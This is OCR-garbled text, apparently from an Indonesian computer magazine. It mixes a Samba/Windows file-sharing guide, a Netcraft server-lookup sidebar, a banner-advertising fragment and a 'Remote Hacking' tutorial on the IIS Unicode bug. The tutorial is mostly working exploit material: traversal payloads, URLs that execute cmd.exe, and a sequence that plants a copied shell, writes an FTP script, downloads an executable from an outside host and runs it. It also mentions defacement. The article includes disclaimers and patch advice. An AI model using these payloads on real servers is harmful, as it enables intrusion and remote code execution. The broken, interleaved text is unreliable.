& SAMBA LINUX

Share resource ( file & printer) m erupakan salah satu aplikasi utam a PC yang terkait ke jaringan LAN. Dengan LAN, sem ua kom puter pada LAN dapat bersam a-sam a m enggunakan printer ataupun berbagi ( sharing) suatu file.

S

M ENYETEL IDENTIFICATION

Untuk m engidentifikasi sebuah PC di jaringan SMB, kita perlu m enyetel (set) Identification di Netw ork Setting Window s. Yang perlu disetel biasanya Com puter nam e dan Workgroup.

PENGENALAN KOM PUTER

Proses pengenalan komputer di jaringan juga dimudah- kan di Linux SWAT, pada bagian global kita bisa menset workgroup dan netbios name (ekuivalen dengan Com- puter name di Windows). Kebetulan ada beberapa set- tingyang juga di-set di parameter global ini, seperti Se- curity, OS level, WINS dll yang merupakan fasilitas yang dibutuhkan untuk menggunakan Samba sebagai peng- ganti NT Server di Windows. Biasanya untuk memudah- kan proses sharingdi jaringan Windows, sebaiknya secur- ity di set sebagai SHARE. Jika di ubah menjadi DOMAIN, USER dll akan memerlukan penanganan yang lebih serius di-setup Samba server yang sudah sekelas NT Server. M ENGAKTIFKAN SM B DI WINDOWS

SMB harus di aktifkan di Window s dengan m enginstal protocol NetBUI di Start →Control Panel →Netw ork.

INSTALASI SM B

Pada Linux, proses instalasi SMB dilakukan dengan m enginstal program Sam ba. Paling m udah jika kita lakukan pada saat aw al instalasi Linux. Untuk m em u- dahkan proses adm inistrasi Sam ba, telah di sediakan softw are SWAT yang dapat diakses di

http:/ / localhost:901.

1A

2A

2B

1B

SMB Windows vs. Samba Linux

NeoTekno

PENGATURAN SHARE PRINTER

Pada Sam ba, proses share printer dilakukan lew at bagian Printers di SWAT. Jika ada printer yang tersam bung ke m esin Linux, pada dasarnya dapat di share dengan m udah m elalui Sam ba. Seperti biasa proteksi keam anan yang dijanjikan bisa dibuat lebih ketat daripada Window s.

SHAREPRINTER

Selain share file atau folder, jika m eng-klik tom bol ka- nan pada salah satu printeryang tersam bung ke Window s, m aka kita dapat m en-share printer tersebut. Fasilitas proteksi passwordjuga di sediakan oleh Window s.

4A

STATUS SERVER DI SAM BA

Server status barangkali m erupakan bagian yang tidak bisa ditem ukan di Window s98. Di sini kita bisa m en-set berapa interval SMB untuk m em beritahukan sem ua kom puter di jaringan, kondisi softw are sm bd & nm bd. Share m ana saja yang sedang di akses, oleh siapa dll.

5

SHARINGFOLDER ATAU FILE

Pada Window s, proses sharingsebuah folder ataufile dapat dengan m udah dilakukan m elalui Window s Ex- plorer dan m engklik tom bol kanan di m ouse yang kita gunakan untuk menset parameter sharing sebuah folder seperti tam pak pada gam bar. Berbeda dengan Sam ba, proses security di-set untuk setiap share resource.

3A

FASILITAS SHAREPada Samba, fasilitas sharedigunakan untuk menset fol- der atau direktori yang akan di-share. Beberapa para- m eter yang penting adalah path directoryyang akan di- share, share nam e sebagai apa, user/ group m ana saja yang bisa m engakses share tersebut, m esin m ana saja yang diizinkan m engakses share tersebut, apakah share bisa di-writedsb.

3B

DOKUM EN ONLINE SAM BA

Yang juga tidak ada di Windows adalah dokumen online tentang Sam ba. BukuUsing Sambayang biasanya di- jual seharga US$34.95 telah disertakan dalam paket Sam ba. Bagi yang secara serius m em baca buku ini, dapat dengan m udah m enset Sam ba m enjadi Server yang tangguh dan bukan m ustahil m engalahkan NT Server untuk keperluan share resource di jaringan.

6

4B

NeoTekno

An d a d ap at m em an faatkan b u g yang ada pada sistem Window s NT u n tu k b erlatih h a ckin g.

Rio M artin

kem b ali m en gu raikan lan gkah - langkah yang dapat anda lakukan untuk belajar m enjadi h a cker. WAL DAN DASAR-DASARmenge-

nai hubungan TCP/IP, cara

daem on serverbekerja , serta cara memanfaatkan kelemahan dae- mon server dengan exploittelah diba- has pada NeoTek Vol. II, No. 2 Novem- ber 2001. Maka kali ini pembahasan akan difokuskan pada pemanfaatan

bugyang ada pada IIS(Internet Inform- ation Service) yakni sebuah service

yang terinstal pada Microsoft Windows NTSystem. Layanan IISini terdiri atas FTPService dan Web Service yang

listeningpada port 21 dan 80. Persiapan Awal

Karena sangat diharamkan untuk bela- jar hacking pada sistem orang lain (su- paya tidak dikatakan perusak) maka saya sarankan untuk mencoba meng- instal sendiri NTSystem pada PCanda dan jangan lupa aktifkan juga IIS. Untuk Nt4 terinstall dengan IIS-4 se- dangkan Windows2000 terinstall IIS-5. Setelah pada PCanda terinstall IIS, maka anda bisa langsung mulai hackingNT. Coba uji kembali dengan browsing

http://localhost/ dari browseranda. Apabila sudah ada tampilan halaman

defaultdari IIS, maka IISanda sudah berjalan dengan mulus.

Deteksi Hole Pada IIS

IIS memiliki sejumlah bug yang terke- nal dengan sebutan Unicode Bug. Ini-

lah daftar dari sejumlah Unicode Bug tersebut: ..%255c..%255c ..%252e..%252e ..%%35c..%%35c ..%c0%af.. ..%c1%af.. ..%c1%9c.. ..%c1%pc.. ..%c1%1c.. ..%c0%9v.. ..%c1%8s.. ..%e0%80%af.. ..%f0%80%80%af.. ..%f8%80%80%80%af.. ..%fc%80%80%80%80%af.. ..%25%35%63..%25%35%63

..%e0\ %80\ %af../ ..\ %e0\ %80\ %af../ ..\ %e0\ % 80\ %af../

Lalu bagaimanakah cara memanfaat- kannya? IIS memiliki folder khusus untuk menjalankan script-scriptyakni: / scripts / cgi- bin / msadc / _vti_bin / _vti_cnf / iisadmpw d

Format untuk mengetahui apakah ser- veranda memiliki unicode bug atau ti- dak, bisa dicoba dengan langsung men- tesnya padaweb browser.

http:/ / localhost/ scripts/ ..%255c..%255cw in nt/ system32/ cmd.exe?/ c+ dir

Misalnya ada tampilan yang menun- jukkan file-file, maka dipastikan server anda memiliki unicode bug yang bisa dimanfaatkan. Lalu coba lagi untuk folder cgi-bin, msadc, vtibin, dll. Ja- ngan lupa juga ganti dengan unicode lainnya apabila tidak berhasil. Aplikasi Unicode Bug

Unicode bug ini merupakan kelemah- an pada IIS yang memungkinkan sese- orang untuk menjalankan com m and- commandpadashell windowslangsung. Jadi command-command seperti dir, m kdir, copy, ping,bahkan sampai pada

form at, del, deltreeyang sifatnya me- rusak pun bisa dijalankan.

Cuma sekali lagi saya sarankan jangan- lah berbuat merusak kalau ini anda praktikkan terhadap server yang bu- kan milik anda (rem ote server). Kita sesama pengguna Internet diharapkan menjadi teman, dan bukan musuh satu sama lain yang saling menghancurkan. Lantas bagaimana cara mengetahui folder index daripada webserver IIS ? coba ketikkan http:/ / localhost/ t3rm.ida dan pada browser akan menampilkan lokasi folder index web berada. Biasa- nya hal ini digunakan untuk mencari file index.htm dan akhir-akhirnya di- gunakan untuk deface halaman index dari suatu web. Percayalah deface bu- kan hal yang baik untuk dilakukan, kalau anda mau pamer untuk menam-

A

Re m o t e

Re m o t e

Hacking_Hacking

M e m a n f a a t k a n U n i co d e Bu g p a d a Se r v e r N T

NeoTekno

pikan identitas anda, pasang saja web- server yang berjalan di port lain lalu disitu buat sesuka anda file index.htm

nya, dibandingkan harus deface file HTMLyang bukan milik kita dan apa- lagi menghapus file-file penting di

websitetersebut.

Lalu bagaimana caranya meng-upload

webserver atau daemon-daemon yang berguna lainnnya ke sana ?

Gambaran langkah-langkahnya seperti ini: setiap NTServer memiliki file FTP.EXEyang berguna untuk melaku- kan FTPupload dan download file ke host tujuan. Nah NTServer yang me- miliki Unicode Bug itu kita suruh me- lakukan downloadke hostmilik kita yang sudah ditaruh macam-macam daemon siap pakai. Cobalah taruh di

free hostyang ada di Internet seperti Geocities, Freeservers dll.

Langkah-langkah menempatkan pro- gram kita ke server NTtujuan hacking. Carilah folder tersembunyi yang bisa dijadikan sebagai markas bersarangnya program-program kita. Misal:

C:\Program Files\atau C:\Inetpubdsb.

Lalu uji apakah folder tersebut memi- liki akses Read and Write, dalam arti apakah folder itu diberi akses untuk

del, m kdir, m odifikasi file,dsb. Misal akan di-copy-kan ke folder Program Files, lakukan command ini di browser:

http:/ / localhost/ scripts/ ..%255c..%255cw in nt/ system32/ cmd.exe?/ c+ copy+ c:\ w innt\ sy stem32\ cmd.exe+ c:\ progra~ 1\ t3rm.exe.

Apabila folder Program Files diberi akses Read and Write maka akan ada tampilan errordan ada tulisan 1 file coppied. Selamat! Berarti anda telah berhasil menyelesaikan langkah per- tama yakni menentukan lokasi markas besar anda.

Untuk selanjutnya perintah unicode sudah dapat anda singkat menjadi

http:/ / localhost/ scripts/ ..%255c..%255cpro gra~ 1/ t3rm.exe?/ c+

Karena anda akan menggunakan FTP yang dioperasikan secara otomatis me- lalui script FTP, maka buatlah script FTP. Perintah yang digunakan adalah ECHO. Bentuk umum penggunaan ECHO adalah echo perintah-ftp >> nama-file-script-ftp.txt

Oke, berikut dicontohkan isi file

t3rm .ftpyang akan saya gunakan un- tuk download file irc.exeyang saya miliki di freeserver geocities.com

OPEN GEOCITIES.COM T3RM PASSWORDSAYA LCD C:\ PROGRA~ 1\ BINARY GET IRC.EXE CLOSE

Penjelasan dari perintah-perintah tersebut:

•OPENmerupakan perintah untuk melakukah hubungan FTPke server tujuan, dimana server tujuan saya adalah GEOCITIES.COM.

•T3RMmerupakan username saya •PASSWORDSAYAmerupakan password

yang harus saya isikan.

Lalu setelah berhasil login ke sana, sa- ya menentukan lokasi tempat down- load saya di server NTyang saya hack

di mana pada skrip di atas adalah C:\ PROGRAM FILES\ , setelah itu karena jenis file yang akan saya download adalah EXEmaka saya tentukan jenis transfernya BINARY. Untuk file-file seperti TAR.GZ,ZIP, gunakan juga BINARY. Hanya untuk file-file seperti HTML,TXT, DOC, baru gunakan ASCIIuntuk trans- fernya.

Lantas bagaimana perintah membuat skrip tsb? Masukkan satu persatu se- perti berikut dan tunggu sampai mun- cul tampilan error CGI Filename****. Hal tersebut berarti menandakan anda berhasil:

http:/ / localhost/ scripts/ ..%255c..%255cpro gra~ 1/ t3rm.exe?/ c+ echo+ OPEN+ GEOCITIE S.COM+ > > + C:\ PROGRA~ 1\ t3rm.ftp http:/ / localhost/ scripts/ ..%255c..%255cpro gra~ 1/ t3rm.exe?/ c+ T3RM+ > > + C:\ PROGRA ~ 1\ t3rm.ftp

http:/ / localhost/ scripts/ ..%255c..%255cpro gra~ 1/ t3rm.exe?/ c+ echo+ PASSWORDSAYA + > > + C:\ PROGRA~ 1\ t3rm.ftp

http:/ / localhost/ scripts/ ..%255c..%255cpro gra~ 1/ t3rm.exe?/ c+ echo+ LCD+ C:\ PROGRA ~ 1\ + > > + C:\ PROGRA~ 1\ t3rm.ftp

http:/ / localhost/ scripts/ ..%255c..%255cpro gra~ 1/ t3rm.exe?/ c+ echo+ BINARY+ > > + C:\ PROGRA~ 1\ t3rm.ftp

http:/ / localhost/ scripts/ ..%255c..%255cpro gra~ 1/ t3rm.exe?/ c+ echo+ GET+ IRC.EXE+ > > + C:\ PROGRA~ 1\ t3rm.ftp

http:/ / localhost/ scripts/ ..%255c..%255cpro nicode adalah suatu cara untuk mendapatkan suatu

solusi komprehensif dalam memetakan secara elektronis semua karakter yang ada dalam bahasa- bahasa di dunia, yang secara teoretis lebih dari 65.000 ka- rakter dibentuk dari pendefinisian karakter 16-bit. Ada dua macam usaha yang terpisah untuk menetapkan character set yang seragam. Pertama adalah proyek ISO 10646 dari International Organization for Standardization (ISO); yang kedua adalah Unicode Project oleh suatu konsorsium pengusaha-pengusaha software multibahasa. Keduanya bekerja sama untuk menciptakan tabel kode bersama. Unicode extension secara default terinstalasi pada Microsoft Internet Information Server (IIS) versi 4.0 dan 5.0. Hal ini memungkinkan karakter-karakter yang tidak digunakan dalam Bahasa Inggris dikenali juga oleh web server ini. Untuk mengetahui lebih jauh kode-kode karakter untuk Bahasa Arab, Hiragana, Katakana, Tamil,Thai, dan lain- lainnya ini, kunjungi http:/ / www.unicode.org/ charts/

IIS Unicode Exploit memungkinkan pengguna menjalankan sembarang perintah pada web server ini. Dengan demikian, server-server IIS yang memuat Unicode extension menjadi rawan terhadap hacking, kecuali yang sudah diperbaiki dengan menggunakan patches yang terbaru.

M ENGENAL UNICODE

gra~ 1/ t3rm.exe?/ c+ echo+ CLOSE+ > > + C:\ P ROGRA~ 1\ t3rm.ftp

Oke, skrip yang anda buat sudah sele- sai dan silakan lihat kembali keselu- ruhan isi dari skrip dengan perintah:

http:/ / localhost/ scripts/ ..%255c..%255cprog ra~ 1/ t3rm.exe?/ c+ type+ c:\ progra~ 1\ t3rm.f tp

Apakah semuanya sudah sesuai dengan urutan? Kalau sudah oke dan sesuai dengan urutannya, maka jalankan FTP dengan menggunakan skrip tersebut dengan perintah:

http:/ / localhost/ scripts/ ..%255c..%255cprog ra~ 1/ t3rm.exe?/ c+ ftp+ -

s:c:\ progra~ 1\ t3rm.ftp

Tunggu prosesnya beberapa saat dan jangan tutup browser.

Buka browser satu lagi dan masukkan perintah

http:/ / localhost/ scripts/ ..%255c..%255cprog ra~ 1/ t3rm.exe?/ c+ dir+ c:\ progra~ 1\ Refresh berulang kali sampai file IRC.EXEsudah nampak dan sizenya sesuai dengan size yang ada pada server GEOCITIES.

Kalau sudah selesai berarti langkah se- lanjutnya adalah jalankan file IRC.EXE tersebut.

http:/ / localhost/ scripts/ ..%255c..%255cprog ra~ 1/ t3rm.exe?/ c+ c:\ progra~ 1\ irc.exe Kalau saja file IRC.EXEmerupakan se- buah program PROXY IRCdan listening

di portanggaplah 8080, maka karena sudah dijalankan di PC anda, rekan anda pun bisa memanfaatkannya asal dia tahu port dan IP addressanda di Internet. Jadi sungguhlah berbahaya apabila anda memiliki server NTyang memiliki bug unicode, terlebih lagi serangan CODE REDpun menggunakan teknik yang sama seperti ini.Band- widthkita akan habis, dan kita pun bisa dijadikan sebuah benteng perta- hanan bagi orang-orang yang tidak bertanggung jawab. Untuk para pemi- lik server NTyang memiliki unicode bugini, saya sarankan untuk sesegera mungkin patch serveranda, atau un- installIIS dan ganti dengandaem on yang lain.

Demikianlah artikel saya kali ini me- ngenai langkah-langkah dasar meman- faatkan unicode bug pada server NT. Anda bisa mengembangkannya ke ba- nyak hal seperti membuat Proxy Ser- ver, Irc Server, WebServer, Streaming Audio Server, dsb pada server NTyang memiliki lubang keamanan tsb. Cuma saran saya jadikanlah sebagai eksperi-

men saja, dan jangan merusak. Kalau perlu beritahu pemilik server agar sesegera mungkin patchservernya. Bila ada yang ingin ditanyakan, saya dan rekan-rekan dapat dihubungi di

#indosniffing-dalnet, atau via milis di

indosniffing@yahoogroups.com .

NeoTekno

Bagaimana dengan kpone.com.sg? Hasilpengecekan dengan Netcraft menunjukkan bahwa mirror situs NeoTek ini menggunakan Apache.

1

Masuk ke situs pelacak jenis server dihttp:/ / www.netcraft.co.Misalkan kita ingin tahu server apa yang digu- nakan oleh www.neotek.co.id

2

Pada sim ple search ketikkanwww.neotek.co.idlalu klik

tom bol Lookup!

3

Voila! Situs NeoTek m enggunakan hosting yang server-nya m enggu- nakan IIS 5.0 dengan Window s 2000.

4

Di bagian bawahnya terda[at dia-gram yang menggambarkan uptime situs ini, Berapa server yang dipakai dan kapan server itu di-boot.

5

Pem ilik server tem pat situs NeoTekditem patkan dapat dilihat dengan m eng-klik Netw ork Operations Center. Juga situs-situs lain di situ.

6

M ENCARI SITUS YANG M ENGGUNAKAN IIS

UNICODE EXPLOIT

Bila anda menginginkan informasi lebih rinci lagi mengenai Microsoft IIS Unicode Exploit, dapatkan white paper dari Lucent Technologies yang dapat di-download di

http:/ / www.lucent.com/ livelink/ 197 020_Whitepaper.pdf

NeoBiz

NDA TENTU PERNAHmelihatnya ketika berselancar, tetapi terge- rakkah anda untuk mengklik- nya? Ya,banneradalah grafik berben- tuk kotak, bulatan atau kadang animasi yang kerap lebih menimbulkan kejeng- kelan ketika ia berupaya membujuk peselancar dunia maya agar mengakses perusahaan pemasang iklan itu lewat klik-an m ouse. Lalu jika si peselancar

telah masuk ke situs pemasang iklan, diharapkan pengklik yang ’nyasar’ itu terbujuk pula membeli barang atau jasa yang ditawarkan.

Selama beberapa tahun terakhir, iklan

bannermendapat cap buruk karena berbagai sebab misalnya karena si- fatnya yang intrusif serta sering salah sasaran. Orang mengatakan bahwa yang kerap terpancing untuk mengklik iklan banner adalah para peselancar baru, sementara peselancar yang ber- pengalaman cenderung untuk meng- hindari banner; entah dengan meng- abaikannya sama sekali atau, pada ka- sus yang lebih ekstrem, dengan me- nyingkirkannya dari halaman Web dengan perangkat lunak penyaring seperti AdKiller (www.adkiller.com).

Pro-kontra tentang banner

Sampai derajat tertentu, riset mengenai keefektifan iklan banner menyokong keberatan orang akan sarana beriklan yang satu ini. Misalnya, sebuah kajian mutakhir yang dilakukan NPD Group (www.npd.com) menemukan bahwa pencarian lewat semacam mesin pen- cari (disebutsearch listing) mengalah- kan iklan banner dalam hal mengingat- kan orang akan merek dagang, mem- buat orang memberikan opini yang positif, dan menimbulkan minat orang untuk membeli. Dikatakan bahwa 55

Bagaim anakah cara terbaik untuk m engiklankan dan m em prom osikan usaha kecil online anda?

A